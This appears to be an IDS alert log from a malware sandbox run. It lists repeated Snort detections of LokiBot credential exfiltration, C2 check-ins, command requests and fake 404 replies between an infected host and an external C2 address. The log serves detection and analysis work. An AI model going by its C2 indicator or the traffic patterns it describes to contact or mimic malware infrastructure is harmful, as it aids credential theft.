Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49705 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49705 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49705 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49705 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49705 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49706 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49706 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49706 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49706 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49706 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49706
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49707 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49707 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49707 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49707 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49707 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49707
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49708 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49708 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49708 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49708 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49708 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49708
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49709 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49709 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49709 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49709 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49709 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49709
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49710 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49710 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49710 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49710 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49710 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49710
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49711 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49711 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49711 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49711 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49711 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49711
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49712 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49712 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49712 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49712 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49712 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49712
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49713 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49713 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49713 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49713 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49713 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49713
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49722 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49722 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49722 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49722 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49722 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49722
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49723 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49723 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49723 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49723 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49723 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49723
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49724 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49724 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49724 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49724 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49724 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49724
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49725 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49725 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49725 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49725 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49725 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49725
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49726 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49726 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49726 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49726 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49726 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49726
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49727 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49727 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49727 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49727 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49727 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49727
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49728 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49728 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49728 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49728 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49728 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49728
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49729 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49729 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49729 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49729 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49729 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49729
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49730 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49730 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49730 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49730 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49730 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49730
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49731 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49731 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49731 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49731 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49731 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49731
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49732 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49732 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49732 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49732 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49732 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49732
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49733 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49733 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49733 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49733 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49733 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49733
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49734 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49734 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49734 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49734 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49734 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49734
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49735 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49735 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49735 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49735 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49735 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49735
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49736 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49736 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49736 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49736 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49736 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49736
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49737 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49737 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49737 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49737 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49737 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49737
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49738 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49738 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49738 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49738 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49738 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49738
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49739 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49739 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49739 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49739 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49739 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49739
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49740 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49740 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49740 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49740 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49740 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49740
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49742 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49742 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49742 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49742 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49742 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49742
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49743 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49743 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49743 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49743 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49743 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49743
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49744 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49744 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49744 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49744 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49744 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49744
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49745 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49745 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49745 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49745 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49745 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49745
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49746 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49746 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49746 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49746 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49746 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49746
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49747 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49747 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49747 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49747 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49747 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49747
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49748 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49748 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49748 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49748 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49748 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49748
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49749 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49749 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49749 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49749 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49749 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49749
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49750 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49750 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49750 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49750 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49750 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49750
